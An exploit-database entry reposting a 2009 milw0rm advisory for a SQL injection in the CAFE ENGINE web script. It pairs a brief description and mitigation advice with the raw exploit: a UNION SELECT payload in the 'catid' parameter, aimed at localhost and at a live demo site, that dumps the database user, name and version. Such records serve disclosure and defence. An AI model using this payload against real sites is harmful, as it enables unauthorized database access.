CAFE ENGINE Remote SQL Injection Vulnerability

vendor:

CAFE ENGINE

by:

SuNHouSe2

CVSS

HIGH

SQL Injection

CWE

Product Name: CAFE ENGINE

Affected Version From: EASY CAFE ENGINE

Affected Version To: EASY CAFE ENGINE

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

CAFE ENGINE Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in the CAFE ENGINE web application. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to sensitive information from the database, such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements.

Source

Exploit-DB raw data:

           
             /************************************************************************/
             /*                                                                      */
             /*                            CAFE ENGINE                               */
             /*                                                                      */
             /*                   Remote SQL Injection Vulnerability                 */
             /*                                                                      */
             /*                                                                      */
             /************************************************************************/
   
                                                                                 


 [~]AUTHOR          : SuNHouSe2 [ALGERIAN HaCkEr]

 [~]HOME            : http://www.snakespc.com                    

 [~]VERSION         : EASY CAFE ENGINE

 [~]BUY SCRIPT      : http://cafeengine.com/  >>> Price : 10$

 [~]EXPLOIT         : 

                     http://127.0.0.1/index.php?catid=4%20UNION%20ALL%20SELECT%201,2,3,Group_concat(user(),0x3a,database(),0x3a,version()),5,6,7,8,9,10--
                     
 [~]DEMO WEBSITE    :
                     http://easy.cafeengine.com/index.php?catid=4%20UNION%20ALL%20SELECT%201,2,3,Group_concat(user(),0x3a,database(),0x3a,version()),5,6,7,8,9,10--
                

                             /////////////////////////////////////////////////////////////////////////////////////
            
                            ////////        Special ThanX : His0k4,& ALL Snakespc.com Members       ////////////
                           ////////             :Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:
                          ////////     ::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::    ////////////
                            
                         ////////////////////////////////////////////////////////////////////////////////////
                                        

                                               -=-=-=-= SuNHouSe2@yahoo.com =-=-=-

# milw0rm.com [2009-02-06]